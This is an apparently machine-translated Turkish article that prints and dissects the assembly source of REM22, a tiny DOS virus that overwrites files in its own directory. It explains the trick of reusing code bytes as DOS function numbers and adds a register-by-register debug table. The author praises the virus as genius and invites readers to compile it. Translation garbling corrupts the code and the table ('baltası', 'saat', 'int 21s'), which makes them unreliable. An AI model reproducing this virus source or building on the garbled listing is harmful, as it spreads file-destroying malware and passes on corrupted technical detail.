      Bu yaratılışın çekiciliği: çok küçük kaynak kodu, derlenmiş yürütülebilir dosyanın çok küçük boyutu, anlaşılmaz (ilk bakışta) algoritma. İşte kaynak kodu (bu arada, REM22 olarak adlandırılır):

    Küçük model
      .code
      .startup
      başlatın:
      pop cx
      hel:
      xchg baltası, bx
      db 108 saat shr 1
      db 4eh; dec si
      db 9eh shr 1
      db 3 kanal; cmp al, xx
      db 100 saat shr 1
      db 40 saat
      fmask db "*. *", 0
      lodsw
      cwd
      mov dl, al
      shl dx, 1
      int 21s
      jmp hel
      uç

    Bence bu virüs bir başyapıt, çünkü böyle küçük bir boyuta sahip
      üreme mekanizmasını organize etmek - deha gerçeği üzerinde çalışmak. Şimdi ne yaptığını ve nasıl yaptığını analiz ettiğimizde, her şey
      yerine düşecek. Bu arada, not edilmelidir: prensip olarak, bu virüs herhangi bir yıkıcı eylem taşımaz (bence üreme böyle düşünülemez), ancak tüm dosyaları enfekte eder
      onunla aynı dizinde. "Profesyonel" bir virüs değildir, yani ciddi yaratımların karakteristik mekanizmalarının çoğundan yoksundur:

    • "arkadaş / düşman" mekanizması yoktur (virüs herkesi ayrım gözetmeden, hatta kendisi veya zaten enfekte olmuş nesneleri bile enfekte eder);
    • bulaşma yalnızca onunla aynı dizindeki dosyalarda oluşur (derlemeye çalışın ve yanında bir klasörde çalıştırın)
         hiç kimse :));
    • virüs polimorfik değildir (kendini şifrelemez ve kodunu değiştirmez);
    • virüs yıkıcı eylemler taşımaz;
    • virüs yerleşik değildir.

    Hadi içimize bir göz atalım
      overrayetera. Kaynak kodu bir exe dosyası oluşturmak için bir modeldir. ".startup" bir TASM yönergesidir, ancak onsuz yapabilirsiniz, ancak "org 100h" yazmanız ve ardından bir etiket (
      sonunda, "son" dan sonra, etiketin adını girin). Takımların geri kalanı herhangi bir kitapta kolayca bulunabilir ve ne yaptığını görebilir (tembel olma). Sadece bu takımların birlikte ne yaptığını anlamak için kalıyor.

    Bu şaheser, 6 kez tekrarlanan sıradan bir döngüdür. Döngüde ne olur? Ve olan şey, int 21h'ye altı farklı fonksiyon (93, 4E, 3C, 40, 2E, 00) diyoruz. görünüm
      sırayla, o zaman:

    "pop cx" - bu sadece cx'i sıfırlamak içindir (bildiğiniz gibi, yığının en üstünde, programın başında sıfır bulunur). Neden? Ve böylece SUB CH komutunda (bak, hata ayıklayıcıda 108 saat ofset olmalıdır) CH \u003d 01 (ofset 2Ah'da (bu PSP'de bir yerdedir) FFh her zaman yatar), yani. Gösterip sadece sub ch, ffh yazamazsınız, ancak bu program kodunu değiştirir ...
      *. *, 0 \u003d sub CH ,, ve bu arama için hazır bir maske ... NEREDE NEREDE VAR !!!

    Yani, alt ch, ffh "Ae" dir (sonunda boşluk olan ASCII kodlarında). Ayrıca, ofset 101'den (kod 93) ofset 10B'ye (kod 00) giden her şey int 21h İÇİN FONKSİYONLARDIR !!! yani bunlar bir döngüde (sayılarının üstüne bakınız) çağırdığımız 6 işlevdir ve elde edilen kod sadece tinsel'dir. KESİNLİKLE HASSAS YOK! Böylece, sözleşmenin işlevlerini toplarsanız ortaya çıktı. Yani, TANAT yazarsam, bu bazı komutların bir sırasına dönüşür, değil mi? Ama bu aslında veri ... bu programda veri diyemezsiniz, ancak int 21h için FONKSİYONLAR, işte bu
      Dahi !!! Daha fazla anlatmanın bir anlamı yoktur - çünkü altı döngünün her birinde fonksiyon denir, tüm kayıtlar yaklaşık olarak
      ideallere uyarlanmış ... Bkz:

    93h işlevi ilk kez çağrılır: Boru (Hata) - programın kendisi için HERHANGİ BİR YÜK YOKTUR, HERHANGİ BİR ŞEY KULLANMAYIN, BASİT OLARAK AŞIRIYOR, GEREK YOK, SADECE GÖRÜNÜYOR ŞİMDİ HER YERDEN !!! Böyle bir "sol" işlev daha olacak - aşağıya bakın.

    İkincisi: 4Eh - buna ihtiyacımız var! Bir dosya arayın ve dx çağrısı sırasında dosya maskesi ofseti (108h) !!!

    Üçüncü: 3Ch - dosya oluşturma. Bu başka bir "sol" işlevdir. Bize ihtiyacı yok. Bir dosya oluşturmamız gerekmez (çünkü kendimizi yalnızca önceki adımda bulduğumuz dosyaya yazmamız gerekir). DX içinde doğal olarak bazı sol çöp yatıyor
      dosya adının ortak bir yanı yoktur, bu nedenle CF \u003d 1 olur ve bir sonraki döngüye geçeriz.

    Dördüncü: 40h - Dosyaya yaz. Ama zaten ihtiyacımız olan şey bu! DX, 100s ofseti içerir (yani REM22'nin başlangıcı), ancak CX biraz başarısız oldu - 400 saat, yani. gerçekten bulunan dosyanın başlangıcına
      400 saat bayt yazılırken, REM22 sadece 22 bayt alır, yani. 1002 ekstra bayt yazılacak. Öyle. Ama kodun dehası göz önüne alındığında, bu affedilebilir.

    Beşinci: 2Eh - Doğrulama Bayrağını ayarlayın. Bu SOL işlev, burada basit - programın eki.

    Altıncı: 00h - bu programdan çıkış yoludur (ben de bilmiyordum).

    Hepsi bu: yani, sadece 3 tanesi anlamlı olan 6 döngümüz var: arama, kayıt ve çıkış.
      Büyük olasılıkla çok olmayacaksın
      poyantno. Bunu anlamak için kaynağı hata ayıklayıcıya yükleyin, izleyin, bakın
      kayıtlardaki verilerin durumu için yorumlarıma bakın. Sonra her şey netleşecek. Sonuç olarak
      Hata ayıklama tablosunu kendiniz derlememeniz için getiriyorum (biri için ve nasıl görünmesi gerektiğini görün). Prensip olarak, tek başına yeterli olmalı,
      Bu virüsde neler olduğunu anlamak için, ama yorumların gereksiz olmayacağını düşünüyorum.

    ADR KOD ASM 1 2 3 4 5 6
    100 59 Pop cx Cx \u003d 0 - - - - -
    101 93 XCHG AX, BX AX \u003d BX \u003d 0 AX \u003d 0, BX \u003d 9300 saat AX \u003d 9300 saat, BX \u003d 0 AX \u003d 0, BX \u003d 0005h AX \u003d 0005h, BX \u003d 0400h AX \u003d 0400h, BX \u003d 2E00h
    102 84 4E 4F TEST B + 4Fh,
       CL
    - - - - - -
    105 3C 80 CMP AL,
       80h
    - - - - - -
    107 40 INC AX AX \u003d 0001 saat AX \u003d 0001 saat AX \u003d 9301 saat AX \u003d 0001 saat AX \u003d 0006 saat AX \u003d 0401 saat
    108 2A 2E 2A 00 ALT CH, B CX \u003d 0100 saat CX \u003d 0200 saat CX \u003d 0300 saat CX \u003d 0400 saat CX \u003d 0500 saat CX \u003d 0600 saat
    10C AD LODSW (DS: SI-\u003e AX) AX \u003d DS:
       100 \u003d 9359 saat
    AX \u003d DS:
       102 \u003d 4E84 saat
    AX \u003d DS:
       104 \u003d 3C4Fh
    AX \u003d DS:
       106 \u003d 4080 saat
    AX \u003d DS:
       108 \u003d 2E2Ah
    AX \u003d DS:
       10A \u003d 002Ah
    10D 99 CWD (DX \u003d E (AX)) DX \u003d FFFFh DX \u003d 0000 saat DX \u003d 0000 saat DX \u003d 0000 saat DX \u003d 0000 saat DX \u003d 0000 saat
    10E 8A D0 MOV DL, AL DX \u003d FF59s DX \u003d 0084 saat DX \u003d 004Fh DX \u003d 0080 saat DX \u003d 002Ah DX \u003d 002Ah
    110 D1 E2 SHL DX, 1 DX \u003d FEB2s DX \u003d 0108 saat DX \u003d 009Eh DX \u003d 0100 saat DX \u003d 0054 saat DX \u003d 0054 saat
    112 CD 21 INT 21s AH \u003d 93 (Boru) - Hata AH \u003d 4E
       (FindFirst)
    AH \u003d 3C (CreateFile) AH \u003d 40 (WriteFile) AH \u003d 2E (SetVerifyFlag) AH \u003d 00 (Sonlandır)
    114 EB EB JMP KISA 101 ??? - - - ??? -
    
    üst